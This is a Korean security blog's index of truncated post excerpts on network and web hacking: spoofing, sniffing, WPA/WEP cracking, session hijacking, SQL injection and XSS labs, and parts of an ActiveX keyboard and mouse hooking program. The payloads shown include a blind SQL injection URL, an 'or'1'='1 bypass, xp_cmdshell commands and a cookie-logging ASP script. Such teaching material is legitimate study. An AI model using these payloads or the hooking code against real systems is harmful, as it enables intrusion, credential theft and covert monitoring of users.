본문 바로가기

Security

SSL Certificate 출처 : https://wiki.kldp.org/HOWTO/html/SSL-Certificates-HOWTO/x70.html 1.3. SSL이란 무엇이며 인증서(Certificate)란 무엇인가?SSL(Secure Socket Layer) 프로토콜은 처음에 Netscape사에서 웹서버와 브라우저 사이의 보안을 위해 만들었다. SSL은 Certificate Authority(CA)라 불리는 서드 파티로부터 서버와 클라이언트의 인증을 하는데 사용된다. 아래는 SSL이 어떻게 작동하는지에 대한 간단한 과정을 설명한 것이다.[웹브라우저] SSL로 암호화된 페이지를 요청하게 된다. (일반적으로 https://가 사용된다)[웹서버] Public Key를 인증서와 함께 전송한다.[웹브라우저] 인증서가 자신이 신용있다.. 더보기
스푸핑(Spoofing) 첨부파일 스푸핑(Spoofing) - Spoof란 단어의 사전적 의미는 'hoax; trick; swindle 골탕 먹이다.; 속여먹다.; 야바위(치다), 우롱, 사취'이다. - 즉 해커가 악용하고자 하는 호스트의 IP 어드레스를 바꾸어서 이를 통해 해킹을 하는 것을 IP 스푸핑이다. - 네트워크 시스템에서 서로 신뢰관계에 있는 A, B 두 시스템간에는 A 시스템의 계정 가지고 B 시스템을 액세스 할 수 있다. - 이는 네트워크에서 신뢰관계를 형성하는 서비스가 네트워크 주소에 기반하여 이를 인증하기 때문이다. 이로 인해 IP 스푸핑이 가능해 진다. - IP 스푸핑은 이 신뢰관계에 있는 두 시스템 사이에서 해커의 호스트를 마치 하나의 신뢰관계에 있는 호스트인 것처럼 속이는 것이다. - 또한 IP 스푸핑과 .. 더보기
스니핑(Sniffing) - Part 2 스위칭 환경에서의 스니핑 ※ 그림 출처 : http://wustyle.egloos.com/ - 과거 허브를 사용하던 시기에는 브로드 캐스트 도메인의 특성으로서 랜에서 오는 모든 신호를 복사해서 모든 포트에 뿌려주므로 보안상 치명적이였다. - 허브를 개선한 스위치는 무조건 패킷을 보내 네트워크의 대역폭 낭비를 막기위해 개발되었다. - 허브와는 달리 MAC주소 테이블이 존재하여 포트 별로 MAC주소 값이 할당되므로 그곳에만 전파를 한다. - 따라서 허브와는 달리 보안상 아주 좋은 장비라고 볼 수 있으나, 역시 스위치환경에서 스니핑하는 방법은 존재한다. ARP 리다이렉트 ※ 그림 출처 : http://securitymusings.com/ - 2계층 공격으로서, 위조된 ARP Reply를 보내어 공격자가 MAC.. 더보기
스니핑(Sniffing) - Part 1 첨부파일 스니핑(Sniffing) - Sniffing이란 단어의 사전적 의미는 ‘코를 킁킁거리다’, ‘냄새를 맡다’ 등의 뜻이 있다. - 사전적인 의미와 같이 해킹 기법으로서 스니핑은 네트워크 상에서 자신이 아닌 다른 상대방들의 패킷 교환을 엿듣는 것을 의미한다. - 간단히 말하여 네트워크 트래픽을 도청(eavesdropping)하는 과정을 스니핑이라고 할 수 있다. - 이런 스니핑을 할 수 있도록 하는 도구를 스니퍼(Sniffer)라고 하며 스니퍼를 설치하는 과정은 전화기 도청 장치를 설치하는 과정에 비유될 수 있다. - TCP/IP 프로토콜은 학술적인 용도로 인터넷이 시작되기 이전부터 설계된 프로토콜이기 때문에 보안은 크게 고려하지 않고 시작되었다. - 대표적으로 패킷에 대한 암호화, 인증 등을 고려.. 더보기
목록화(Enumeration) 목록화(Enumeration) - 목록, 일람화를 해놓는 것으로서, IP추적, 포트 스캔 등을 통해 얻어낸 정보들을 한눈에 알아볼 수 있도록 정리하는 것이다. - 실제로 공격을 하기 전의 작업이며, 해커마다 자신만의 스타일을 통해 목록을 만들어 놓는다. 윈도우 시스템의 목록화 - 사무에 있어 가장 널리 사용하는 OS는 윈도우 체제이며, 파일의 공유, 프린터 등의 일반 사무기기와의 통신을 위해 NetBIOS를 사용한다. - NetBIOS(Network Basic Input/Output System)은 프로토콜로서 한 사무실 내의 컴퓨터끼리 연결을 하여 공유하거나 프린터 공유에 많이 쓰인다. - 그러나 NetBIOS에 점점 기능이 추가 되어감에 따라 포트를 여러 개 사용함으로서 보안적 측면에서 위험이 따른다.. 더보기
풋프린팅(Footprinting)과 스캔(Scan) 풋프린팅(Footprinting) - 풋프린트(Footprint)는 발자국을 뜻하며, 풋프린팅(Footprinting)은 그 발자국을 살펴보는 것이다. - 발자국을 살펴보아야 그 경로는 어디로 향하고, 사람인지 동물인지 정보를 알 수 있다. - 이렇게 해킹을 하기위해 모든 정보들을 체계적이고 조직적으로 모으기 위해 풋 프린팅은 반드시 필요하다. - 특정 기술이나 구성에 관한 중요한 정보들을 작은 것일지라도 놓치지 않도록 하기 위한 것이다. 공격자들이 사용하는 기법과 확인 가능한 정보들 사용기법 확인 정보 인터넷 도메인 이름(Domain Name) 네트워크 블록(Network Blocks) 인터넷을 통해 접속 가능한 시스템의 특정 IP 주소 시스템의 구조 접속제어 매커니즘과 관련 접속 제어 리스트 침입 탐.. 더보기
Blind SQL Injection Blind SQL Injection 악의적인 문자열 삽입 대신 쿼리결과로 나오는 참, 거짓에 따라 DB에 정보를 취득하는 공격기법이다. 이 Blind SQL Injection 을 이용하면 숫자형태의 데이터까지도 알아낼수도 있다. 간단한 예제로 알아보자.  정상적인 페이지 URL 입니다. 마지막에 " 을 넣어 봤다.  데이터베이스의 오류를 통해서 이서버는 무슨 데이터베이스를 사용하는지 알게되었다. 이건 아주간단한것이고, URL 쿼리문에 SQL 구문을 넣어가면서 페이지가 뜨면은? 참인거구 거짓이면 페이지가 안뜹니다 천천히 정보를 취득해나가는거죠. 완전 노가다입니다. Example> http://www.xxx.com/board/board_view.asp?num=106 and substring(db_name.. 더보기
[무선해킹] 802.11 WPA 크랙 WPA - WPA 는 WEP 이후에 나온 암호화 인증 방식 - Authentication 과정에서 handshake 를 하는데 이때 key가 들어간다. WPA 크랙 - 인증 과정에 key가 들어있기 때문에 인증과정을 스니핑해서 디션어리 어택을 하면 crack 가능하다. 인증과정 수집 방법 1. User 연결하는 순간에 수집 - 하지만 그 순간에 자주 있는 것이 아니라서 수집하기 어려움 2. 이미 연결되어 있는 station 을 Dos공격으로 끊고 재연결할때 수집 Dos 공격 해커가 AP로 위장하여 DeAuthentication 패킷이나 DeAssociation 패킷을 보내서 강제로 접속을 끊어버린다. 실습 실습환경: vmware (backtrack4), 공격AP SSID (WAP MAC : 5C:D9:.. 더보기
[무선해킹] wep 해킹 환경 OS : BackTrack5R1 (Ubunto) Wireless Adaptor : iptime NCUBIC (chipset : rtl8192cu) USB type VMware v7.1.4 1. 무선랜 환경설정기본적으로 VMware를 이용하여 BackTrack을 사용할 때 BackTrack은 무선랜을 인식하지 못한다. 랩톱의 무선랜 카드도 인식하지 못하니 USB 방식의 무선랜을 하나 구입하는 것이 좋다. - 원인 - VMware에는 약 10개정도의 디폴트 Virtual Network Adaptor가 있는데 실제 장비로부터 NAT, Bridge등의 방식으로 데이터를 주고 받기 때문에 VMware에 설치된 리눅스 운영체제는 자신의 Network Adaptor를 wired state로 인식한다. USB무선.. 더보기
TCP Session Hijacking 이번강의는 TCP 세션하이재킹에 관한걸 배워볼것입니다.  먼저 세션에 대해 알아보자. 세션이라 함은 사용자와 컴퓨터, 또는 두대의 컴퓨터간의 활성화된 상태이다. 그러면 세션 하이재킹 이란 무엇일까? 무선 AP와 노트북 PC간에 이루어지는 통신 정보인 세션을 가로채서, 사용자 인증 절차를 거치지 않고 해당 노트북 PC와 동일한 권한을 얻는 것을 예로 들어 설명할 수 있겠다. 서버로의 접근 권한을 얻기 위한 ID와 PASSWORD를 사용하는 인증절차를 건너뛸 수 있다는 것이 해커의 입장에서 장점(?)이다. 이런 하이재킹에 성공하면 해당 서버와 동일한 권한을 얻게 되므로 공격자는 서버와 사용자가 주고받는 모든 내용을 감시 할수 있게된다.(스니핑) 공격자의 입장에서 보면 사용자의 ID,PASSWORD를 수집하.. 더보기
FTP 서버 Dos 공격 첨부파일 소켓프로그래밍으로 제작한 도스공격에관한 설명을 드리겠습니다. 일단 제가 올린 소스를 받으시고 visual studio 로 컴파일을 해봅시다. 그다음에 프로그램을 실행하기전에 ftp 서버를 열어두시고 소켓을 배우신분들은 아시겠지만 모르는분은 아 이렇게 돌아가는군아 생각을 하시고 넘어가시길 바랍니다.      주석을보고 소스를 이해해보시길 바랍니다 ~ ^^ 위에 소스코드는 제소켓 프로그래밍게시판에 설명이 나와있습니다 ~  감사합니다. 악용목적으로 사용하지마시길.. 점점 패치해나갈예정입니다. [출처] [제작] FTP 서버 Dos 공격|작성자 xHosa 더보기
DNS 스푸핑(Spoofing) 저번시간에 ARP 스푸핑에 이어서 DNS 스푸핑에 관한걸 배워볼것입니다. 일단 DNS스푸핑을 배우기전에 DNS에 관해서 아셔야하는데.. DNS 란 ? Domain Name Server의 약자이며, 인터넷 이용을 하는데에 있어서 IP보다 외우기 쉬운 도메인 이름으로 인터넷을 사용하기 위해 사용되는 서버입니다. DNS는 분산 관리 원칙에 의해 트리 형태의 구조를 가지고 있는데, 아래의 그림을 보면, 최상위에 ROOT DNS가 있고 하위에는 각 분류에 따른 DNS가 있습니다.이때, 도메인 이름은 왼쪽에서 오른쪽 갈수록 최상위 도메인이됩니다. 우리가 웹사이트를 이용하는데 있어 가장 필요한것은 DNS 이다. DNS 가 없던시절 하나하나 적은 hosts 파일을 FTP 서버에 올려두고 가져다가 사용하는 방식이였다.. 더보기
ARP 스푸핑 (poisoning) 두 번째.. 실습 첨부파일 ARP Spoofing • ARP Spoofing은 로컬에서 통신하고 있는 서버와 클라이언트의 IP 주소에 대한 2계층 MAC 주소를 공격자의 MAC 주소로 속여 클라이언트가 서버로 가는 패킷이나 서버에서 클라이언트로 가는 패킷을 중간에서 가로채는 공격이며 공격자는 이 패킷을 읽고 확인한 후 정상적인 목적지로 향하도록 다시 돌려보내 연결이 끊어지지 않고 연결되도록 유지 ARP Spoofing 필요한 툴 설치 A) ARP Spoofing 툴 - IP 주소에 해당하는 본래 MAC 주소가 아닌 다른 컴퓨터의 MAC주소로 변경하는역할 • fake-1.1.2-1.i386.rpm 다운로드 → # rpm -Uvh fake-1.1.2-1.i386.rpm B) 패킷 Relay 툴(fragrouter 1.6) -.. 더보기
ARP 스푸핑 (Poisoning) 첫 번째 ARP 용도 - 상대편의 IP주소는 알지만, MAC 주소를 모를때 사용한다. 작동방식 - 상대편의 IP주소는 알고 있지만 MAC주소를 모르기 때문에 목적지 MAC 주소를 FF:FF:FF:FF:FF:FF 로 적어서 방송을 한다. (IP주소에 대한 MAC 주소를 아는 사람 있으면 응답해주세요!!) ARP Poisoning 은 이 취약점을 이용한것이다. 잘 설명하자면, Victim(피해자) Hacker(공격자) 두 컴퓨터가 있다. Vitim의 맥주소 테이블에 게이트웨이 맥주소는 aa:aa:aa:aa:aa:aa 로 저장이 되어있다. 하지만 해커가 victim 의 맥주소 테이블에 포이즈닝 즉 독약을 처맥여버리는것이다. victim 의 맥주소 테이블에 저장되어있는 게이트웨이 맥주소를 bb:bb:bb:bb:bb:bb.. 더보기
엑티브엑스 컨트롤을 이용한 후킹 프로그램 4. 후킹 구현 앞에서 만든 폼뷰(FormView)에 후킹을 해줄 기능을 구현해 준다. // ChatFormView.cpp : 구현파일입니다. // #include "stdafx.h" #include "GlobalHooking.h" #include "ChatFormView.h" #include #include "KeyHook.h" // CChatFormView IMPLEMENT_DYNCREATE(CChatFormView, CFormView) CChatFormView::CChatFormView() : CFormView(CChatFormView::IDD) , list(_T("")) { IsStart = false; SockStart(); } CChatFormView::~CChatFormView() { } void CChat.. 더보기
엑티브엑스 컨트롤을 이용한 후킹 프로그램 3. 후킹 구현 앞에서 만든 폼뷰(FormView)에 후킹을 해줄 기능을 구현해 준다. 시간 관계상 설명은 나중에 #pragma once #include #include #include "TrayIcon.h" #include "afxwin.h" #pragma comment(lib, "ws2_32") #define WM_HOOKED WM_USER+1 #define WM_HOOKEDM WM_USER+2 #define WM_ICON_NOTIFY WM_USER+10 using namespace std; // CChatFormView 폼뷰입니다. class CChatFormView : public CFormView { DECLARE_DYNCREATE(CChatFormView) WCHAR Mes2[256]; SOCKET s; BO.. 더보기
엑티브엑스 컨트롤을 이용한 후킹 프로그램 2. 폼뷰 만들기 우선 엑티브엑스 틀을 만들어줄 폼뷰를 만들어 준다. 새 프로젝트에서 MFC ActiveX 컨트롤 을 선택 후 마침 선택 리소스에서 Dialog 추가 후 다이얼로그에서 그림과 같이 클래스 추가해준다 후킹 시작 버튼 : IDB_START 리스트박스 : IDL_LIST . MFC 클래스 마법사에서 클래스 이름을 GlobalHookingView 로선택해주고 기본클래스를 CFormView로 선택해 준다. GlobalHookingView 클래스에서 Create함수를 오버라이딩 해준다. GlobalHookingCtrl 클래스에서 WM_CREATE 윈도우 메시지를 생성해준다. int CChatFormCtrl::OnCreate(LPCREATESTRUCT lpCreateStruct) { if (COleControl::On.. 더보기
엑티브엑스 컨트롤을 이용한 후킹 프로그램 1. DLL만들기 엑티브엑스 컨트롤을 이용한 후킹 프로그램 1. DLL만들기 먼저 키보드와 마우스를 후킹해주는 DLL파일을 만들어 준다. 새 프로젝트에서 Win32 콘솔 응용프로그램 선택 후 응용프로그램 종료 DLL 선택 KeyHook.cpp와 KeyHook.h 파일 생성 KeyHook.cpp #include #define WM_HOOKED WM_USER+1 #define WM_HOOKEDM WM_USER+2 #pragma data_seg(".kbdata") HINSTANCE hModule=NULL; HHOOK hKeyHook = NULL; HHOOK hMouseHook = NULL; HWND MyhWnd=NULL; #pragma data_seg() #pragma comment (linker, "/SECTION:.kbda.. 더보기
No.3 해시(Hash) (1) 해시란? => 하나의 문자열을 이를 상징하는 더 짧은 길이의 값이나 키로 변환 하는 것입니다. 해시는 암호화는 아니지만 대칭 암호화 , 비대칭 암호화 와 같이 사용하면 다양한 기능이 구현됩니다. (2) MD5 = > 대표적인 해시 알고리즘입니다. 32개의 16진수로 이루어져 있습니다. 즉 어떠한 평문이 있을때 MD5 해시 알고리즘을 거치게 되면 거치기 전의 값을 추측하는것이 불가능하게된다. 예를들어 Hi ----------------->( 해시 알고리즘 과정 ) ---------->(051395920adeff49a304e4053bcefa) 위 처럼 32개의 문자로 변하게 됩니다. 평문의 길이가 어떻든 무조건 32개의 문자 와 숫자의 조합으로 변합니다. (3) 해시의 용도? => 해시는 원래 데이터.. 더보기
No.2 비대칭 암호화 방식 (1) 비대칭 암호화 방식 => 대칭 암호화 방식에서 평문을 암호화 하면 복호화 하는 사람도 무조건 암호화 키를 가지고 있어야 함에 따라, 항상 암호문을 만든 사람은 복호화 할 사람에게 암호화 키를 전달해주는 단점을 해결한 방식. 지금의 인터넷뱅킹에서 쓰이는 방식! (2)RSA 알고리즘 => RSA 알고리즘에서는 모든 사람이 고유한 N 값을 갖게 되고 N은 두 소수의 곱으로 이루어집니다. 만약 A라는 사람이 자신의 N을 p=17,159 q=10,247로 정했다면 이 둘의 곱인 N = 175,828,273으로 정해지고, A는 자신의 N값을 모든 사람들에게 공개함으로써 이때의 N 값이 A의 공개키가 되는 것입니다. A에게 무언가를 보내고싶은 사람은 N값을 찾아 어떤 알고리즘을 통해 암호화를 한후 A에게 보내.. 더보기
No.1 대칭 암호화 방식 (1)대칭 암호화 방식 이란? 근대 까지의 암호화 알고리즘은 거의 대부분 대칭 암호화 방식입니다. 단일 대칭 암호화 방식에서의 부족했던 혼돈 과 확산을 크게 늘려 암호화가 더욱 어렵게 되었습니다. 혼돈 : 암호문의 통계적 성질과 평문의 통계적 성질의 관계를 난해 하게 만드는 성질. 확산 : 각각의 평문 비트와 key 비트가 암호문의 모든 비트에 영향을 주는 성질. (2)DES => 대칭 암호화 알고리즘의 시초로 볼수 있습니다. 64bit의 블록 암호화 알고리즘, 56비트 크기의 암호화 키로 암호화 됩니다. 즉 2의56승으로 약 7200조의 암호화 키가 만들어 집니다. (3)DES의 암호화 과정 위 의 그림처럼의 과정을 거치게됩니다. 먼저, 하나의 블록인 64비트를 L1(32비트) R1(32비트)로 나눕니.. 더보기
No.12 Web Shell, 파라미터 변조 방어법 Web Shell 과 파라미터변조 방어법입니다.  1. Web Shell 방어법  upload 폴더 응용프로그램의 매핑을 제거 시켜줍니다. 웹 셀 업로드시 실행되지않게 업로드 폴더의 모든 확장자에 대해서 응용프로그램 매핑을 제거하시면 됩니다.  [인터넷 정보서비스] => [기본 웹 사이트] => [자신이 생성한 테이블] => [업로드폴더테이블명] => [속성]  에서 마우스 오른쪽 클릭하여 [디렉터리] 탭을 선택합니다. 하단의 [응용프로그램 설정] 부분에서 [만들기] -> [구성] 버튼을 클릭하면 [응용프로그램 구성]창이 뜹니다. 이때 [매핑]탭에서 모든 내용을 제거하시면됩니다. 위와 같은 이미지를 확인해보시면됩니다. 2. 파라미터 변조 방어법 파라미터변조 공격에 대응하기 위해서는 삭제와 .. 더보기
No.11 파라미터 변조 공격 파라미터란 ? => 매개변수라 말할수 있으며, 웹 페이지에서 어떤 요청을 할때 요청에 대한 값을 가지고 있는 변수라고 할수 있습니다.이 때 이 파라미터의 조작을 가하면 비정상적인 동작을 유발시킬수있습니다  실습 해보겠습니다.. 과정 1. admin 계정으로 게시물을 하나 등록합니다   과정 2. 일반 사용자로 또다른 게시물을 등록시킵니다. 과정 3. 게시물을 확인합니다 위의 이미지를 보듯 파라미터변조 #1은 관리자 파라미터변조 #2는 일반사용자임을 알수있습니다. 인제 파라미터변조 #2를 이용해 관리자의 게시물을 변경해보도록하겠습니다 프록시 툴은 Odysseus를 씁니다. 자 저 과정은 1. 파라미터변조 #2를 클릭 2. 수정 3. 그리고 변경을 클릭시에 나오는 idx값을 변조시킵니다. 자 위의 .. 더보기
No.10 Web Shell Upload 공격 이번엔 Web Shell upload 공격입니다. 일반적인 웹셀 업로드 공격은 cmd창을 실행시키는 방법으로 수행됩니다. 실습을 시작해보겠습니다 일단 상대방의 pc에서 cmd창을 실행시킬수있는 asp문을 짭니다. 그후 상대방의 서버 게시판에 업로드 시킵니다. 저가 업로드 시킬려는 cmd실행시키는 asp문의 이름은 cmdasp.asp입니다. 위 같이 업로드 시킵니다. 그후 cmdasp.asp가 업로드된 위치로 이동을 해야됩니다. 고로 오른쪽 클릭해서 바로가기복사 나 속성에서 업로드 주소를 봅니다. 위처럼 업로드 된 위치를 확인합니다. 그후 붙여넣기로 바로 업로드된 위치로 이동을합니다. 그럼 위치로 이동된 화면을 확인해보겠습니다. 자 위와 같은 커맨드창이 뜨네요~ 저기에 디렉토리 확인 명령인 dir 을 해보.. 더보기
No.9 SQL인젝션 방어법 SQL 인젝션 방어법에 대해 알아봅시다. 1. 사용자 입력 값 검증 즉 사용자의 입력 폼과 URL의 입력값을 검증하여 특수문자가 포함되어 있는지 여부를 확인하여 필터링 해야 됩니다. 예를들어 double quote(") single quote(') , (\), (;), (%), (@), (*), (&), (()), ($), (^), (~) , (?) 등의 특수문자등을 필터링해야됩니다 필터링을 위해선 replace() 함수를 쓰시면됩니다. 즉 아까 보았던 board_search.asp => 사용자가 어떤이름으로 게시판 검색asp문을 만드느냐에 따라 다릅니다. 이곳에 더보기
No.8 SQL인젝션 공격 실습(2) 1. 시스템 명령어 실행 select * from member;exec master..xp_cmdshell 'ping 127.0.0.1' SQL쿼리 분석기에 위와 같이 입력하시면 member정보 출력하는거와 ping명령어가 실행되는 것을 볼수있습니다. (;) 즉, 세미클론으로 두가지 명령어를 한번에 실행하는 것입니다. 우와 같은 결과를 보실수 있습니다 즉, 이러한 성질을 이용해 서버에 명령어 실행을 할수 있는것입니다. 그렇다면 실습해봅시다. 로그인 아이디 입력폼에 exec matser..xp_cmdshell 'md c:\board\bbb' 를 하시면 됩니다 하지만 이때. 문제점은 로그인 페이지 입력값의 길이가 위보다 짧게 지정되 있을때 입니다. 이것을 오딧세이 즉 프록시툴로 회피해 보겠습니다. 일단 ad.. 더보기
No.7 SQL 인젝션 공격 실습 SQL인젝션 공격 실습법의 종류 1.인증 우회 => 말 그대로 우회 즉 돌아서 인증을 거치겠다는 것입니다. SQL의 가장 대표적인 공격법입니다. 한번 알아보겠습니다 가. OR연산 이용 즉 입력 폼에 'or'1='1문을 입력하여 결과값을 참으로 하는 법입니다. 예를들어 아이디를 TEST_ID로 하고 패스워드를 test'or'1'=1'을 입력하게 되면 어떻게 될까요? 데이터베이스에 요청하는 쿼리문은 최종적으로 select * from member where id = 'TEST_ID' and bPass\'test'or'1'='1' 과 같이 전달되고 삽입된 or조건에 의해서 or 앞이나 뒤의 두 조건중 단 하나라도 참이면 결과값이 참이 전달이 되어 로그인이 가능하게 되는것입니다. 여기서 주의해야 하실점은 (').. 더보기
No.6 SQL인젝션 알아보기 이번엔 Sql인젝션 공격에 대해 알아봅시다. SQL인젝션 공격 이란?? => SQL 인젝션 공격은 웹 어플리케이션 자체의 버그를 이용하는 웹 해킹 방법으로 SQL 서버에서 실행되는 코드에 악의적인 코드를 추가하거나 삽입하여 권한이 없는 사람이 정보를 획득 하거나 조작 하는 방법입니다. SQL의 종류로는 MS-SQL과 MYSQL등이 있습니다만 서로에 쓰이는 명령어는 거의 흡사하므로 이번에 배우면 두가지 SQL서버에서도 충분히 가능하리라 봅니다. SQL의 저장경로? => 웹 서버 관리자들이 어떤 서버를 만들고 그 데이터베이스처리를 쉽게하기 위해 만들어진것이 SQL쿼리분석기라고 합니다. 쿼리분석기의 모습을 살펴봅시다. 위의 모습이 쿼리입니다. 자신이 회원가입 양식을 어떻게 짰냐에 따라 들어가는 열이 달라지는데.. 더보기
No.5 WebHacking의 시작 WebGoat설치 webgoat 설치방법을 남겨드립니다 ㅋㅋ 맨땅에 해딩몇번하니깐 되네요 ㅋㅋ 일단 jdk와 tomkat설치를 해주셔야합니다 1.http://java.sun.com/downloads/ 여기로 들어가셔서 se버전을 다운받으셔야되요 그게 일반사용자입니다 ㅋㅋㅋ 다운받으실때 accpet하시면되요 밑에 라이센스체크하는부분에 안하시면 다운안받아집니다 . .그리고 가입을 하셔야될텐데 가입하시는건 매우 간단해요 ㅋㅋ 보면 바로 하실수있습니다 저가 추천하는건 jdk 6.0 update27 버전인가 그거입니다 7.0은 아직 몬가 ㅋㅋㅋㅋ 그리고나서 java가 제대로 설치되었나를 확인하는 방법은 cmd에서 java -version이나 java 치셨을때 오류없이 나오면 제대로 설치가된거에요 2.그다음에 tomkat설치를 해주.. 더보기
No.4 XSS 공격 실습 xss 공격 실습해보겠습니다. 일단 공격스크립트가 포함된 게시물을 읽어야 하기 때문에 .asp로 된 파일을 하나 생성합니다. 쿠키값을 getcookie.txt파일로 저장합니다. msg=request("msg") set fs=server.CreateObject("scripting.FileSystemObject") set thisfile=fs.OpenTextFile(testfile,8,true,0) thisfile.writeline(""&msg&"") thisfile.close set fs=nothing %> 간단히 메모장을 열어 공격자 pc에서 작성하시면됩니다. 시나리오로는 이 xss공격 스크립트가 입력된 게시물을 admin이 읽으면 admin의 쿠키값이 getcookie.txt 파일에 저장되고 공격자는 .. 더보기